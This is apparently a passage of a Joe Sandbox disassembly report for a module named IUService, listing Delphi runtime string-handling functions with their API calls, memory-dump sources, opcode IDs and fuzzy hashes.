                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$AnsiStringSystem@@$FromStr$qqrr20Stringx27System@%T$us$i0$%$InternalSysutils@$ByteChar$qqrx20Comp$qqrpbt1StringiType$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1446078087-0
                                                                                                                                            • Opcode ID: c5b83aefb23b3358bd06b18d679ca1007ac45f940c9c0406256258f96d7ac833
                                                                                                                                            • Instruction ID: beebbf29126e9d6e6507f71e1fa188fd936efd99e5be5d72eda28bad75657d21
                                                                                                                                            • Opcode Fuzzy Hash: c5b83aefb23b3358bd06b18d679ca1007ac45f940c9c0406256258f96d7ac833
                                                                                                                                            • Instruction Fuzzy Hash: 10215C30A0138ADFEF01DEB8DD9299DB7F5EF54201F904675A5409B265EB70DE85CA80
                                                                                                                                            Function 500158D8 Relevance: 12.1, APIs: 8, Instructions: 75COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500159A6), ref: 5001591B
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500159A6), ref: 50015943
                                                                                                                                            • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500159A6), ref: 50015963
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500159A6), ref: 5001596F
                                                                                                                                            • @Sysutils@AnsiStrComp$qqrpbt1.RTL120(00000000,500159A6), ref: 5001597B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$AnsiStringSystem@@$FromStr$qqrr20Stringx27System@%T$us$i0$%$InternalSysutils@$ByteChar$qqrx20Comp$qqrpbt1StringiType$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1446078087-0
                                                                                                                                            • Opcode ID: 967e1a292ced734fea3fda5a5ef9006a9914c61bdb3ab0efd8a449f196f86bfa
                                                                                                                                            • Instruction ID: 972cb8add0711401713003887be376873cbf6b1675d33c83f3af55f82446fe10
                                                                                                                                            • Opcode Fuzzy Hash: 967e1a292ced734fea3fda5a5ef9006a9914c61bdb3ab0efd8a449f196f86bfa
                                                                                                                                            • Instruction Fuzzy Hash: 87219D30A0028ADFDF01DFB9DD8169DB7F5EF45211F504276E6009B255EB30DE82D642
                                                                                                                                            Function 50015534 Relevance: 12.1, APIs: 8, Instructions: 74COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500155FB), ref: 50015563
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500155FB), ref: 50015582
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500155FB), ref: 500155AA
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,500155FB), ref: 500155C4
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,500155FB), ref: 500155D3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$System@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Internal$Compare
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1952152088-0
                                                                                                                                            • Opcode ID: 49bd338da330a834a7d5b6809eacd117c69c76319b46f620415589b967403da5
                                                                                                                                            • Instruction ID: 8a79f3fe02d8f7039cd64eb97ab1fc8fe1bf3bea09e212b9e8f8072deb91f6bc
                                                                                                                                            • Opcode Fuzzy Hash: 49bd338da330a834a7d5b6809eacd117c69c76319b46f620415589b967403da5
                                                                                                                                            • Instruction Fuzzy Hash: 45216F70610685EFEB11DEB8DDA299EB7FAEF44240F904662E600EB291E770DE81D650
                                                                                                                                            Function 5001A0A8 Relevance: 12.1, APIs: 8, Instructions: 73COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0C8
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0D2
                                                                                                                                              • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0EF
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A117
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A12B
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A135
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000000,00000000,?,00000000,?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?), ref: 5001A142
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Char$qqrx20InternalStringx20$CompareFreeMem$qqrpv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2845561448-0
                                                                                                                                            • Opcode ID: a637fd93928d4bcc59d4fbf31d7dd1fda35c7064787cfb8b0e7d3fb8d7a31359
                                                                                                                                            • Instruction ID: 557e5c510faaf08c59fda0598d3fc89e05443d392f4ccd520a77b62b8c30d619
                                                                                                                                            • Opcode Fuzzy Hash: a637fd93928d4bcc59d4fbf31d7dd1fda35c7064787cfb8b0e7d3fb8d7a31359
                                                                                                                                            • Instruction Fuzzy Hash: 2F219331B003A5ABEF11DAB4DC52A5AB7F8EF49200F514272EA00E7246E770EE85C690
                                                                                                                                            Function 5001A248 Relevance: 12.1, APIs: 8, Instructions: 73COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A268
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A272
                                                                                                                                              • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A28F
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2B7
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2CB
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2D5
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2E2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Char$qqrx20InternalStringx20$CompareFreeMem$qqrpv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2845561448-0
                                                                                                                                            • Opcode ID: e7b34f49780f89b28d14b2ecf1d82b6ca6848bd6e1332e36c68cebb614f42406
                                                                                                                                            • Instruction ID: 839b017c909a13abe63715c34b3dec019e8b2fcbb166aed1b6d102ad71667342
                                                                                                                                            • Opcode Fuzzy Hash: e7b34f49780f89b28d14b2ecf1d82b6ca6848bd6e1332e36c68cebb614f42406
                                                                                                                                            • Instruction Fuzzy Hash: 7B219331A003A5ABEF01DAB8DD91A5AB7F8EF49600F514272FA00E7245E670DE85C690
                                                                                                                                            Function 5001A17C Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A238), ref: 5001A1C0
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A238), ref: 5001A1E8
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A238), ref: 5001A1FC
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A238), ref: 5001A206
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001A238), ref: 5001A213
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$System@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Internal$Compare
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1952152088-0
                                                                                                                                            • Opcode ID: 60bac2dbcf486b484fd8edb7a338e1cfbf0ddd4389093eb7d5b855bee5dfed36
                                                                                                                                            • Instruction ID: 7aa712e8d9422046bf6ebc41a1e60e2c3364a706724e098922e2a107fb2dba3f
                                                                                                                                            • Opcode Fuzzy Hash: 60bac2dbcf486b484fd8edb7a338e1cfbf0ddd4389093eb7d5b855bee5dfed36
                                                                                                                                            • Instruction Fuzzy Hash: 27217270A41299AFEF01DFB8DC9299EB7F8EF55210F904672EA40A7245E7709E80D690
                                                                                                                                            Function 50016A84 Relevance: 12.1, APIs: 8, Instructions: 66COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AA8
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                                                              • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                                                              • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                                                              • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AC1
                                                                                                                                              • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AC9
                                                                                                                                              • Part of subcall function 5001B48C: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120 ref: 5001B497
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AE1
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AE9
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016B07
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016B0F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$FromString$Char$qqrr20StringbSysutils@$Int$qqrx20$AnsiInternalStr$qqrr20Stringx20Stringx27System@%T$us$i0$%$Asg$qqrr20Cat$qqrr20CharLen$qqrr20Long$qqrx20Soundex$qqrx20Str$qqriStringiStringpbiStringriStrutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1727032514-0
                                                                                                                                            • Opcode ID: 9544c1ba6febaeb11602175b13897d1a00f0a9f904f52e82c35a4ea79f3a4763
                                                                                                                                            • Instruction ID: 73112111d8c23333898401fd14fec3439d1d4c23f5a36a265c86c13f67aa07f8
                                                                                                                                            • Opcode Fuzzy Hash: 9544c1ba6febaeb11602175b13897d1a00f0a9f904f52e82c35a4ea79f3a4763
                                                                                                                                            • Instruction Fuzzy Hash: 98119370B051489FDB04EFE4DC929EEB3A6EBD4210B55C376A9008374AEB38AE459694
                                                                                                                                            Function 5000D4C4 Relevance: 12.1, APIs: 8, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4E2
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4F4
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4FD
                                                                                                                                            • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D508
                                                                                                                                              • Part of subcall function 5000CE0C: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,?,?,5000D50D,?,00000000,5000D54A), ref: 5000CE34
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D519
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D525
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D52F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$Asg$qqrr20Stringx20$Length$qqrr20Stringi$AnsiByteCharChar$qqrx20Clr$qqrpvFromMem$qqrrpviMultiReallocStr$qqrr20Stringx27System@%T$us$i0$%Unicode$qqrpbuipcuiUtf8Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1178600862-0
                                                                                                                                            • Opcode ID: f46a319949a0f8be63f242d61074621778d9a0e6e5d67ca0fbb5c852c94508df
                                                                                                                                            • Instruction ID: b68bba9100bf9d62a181cd0ba84c1bf9c83d5d046ee87d3bee0c1ba5abf9dfab
                                                                                                                                            • Opcode Fuzzy Hash: f46a319949a0f8be63f242d61074621778d9a0e6e5d67ca0fbb5c852c94508df
                                                                                                                                            • Instruction Fuzzy Hash: 26016830601AC8ABFB10CFB5DCB299EB7EADF95204BE08A73F80087111EA30DE01C590
                                                                                                                                            Function 5000B2CC Relevance: 10.6, APIs: 7, Instructions: 109COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B31F
                                                                                                                                            • @System@@WStrAsg$qqrr17System@WideStringx17System@WideString.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B336
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B34D
                                                                                                                                            • @System@@CopyArray$qqrv.RTL120(?,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B386
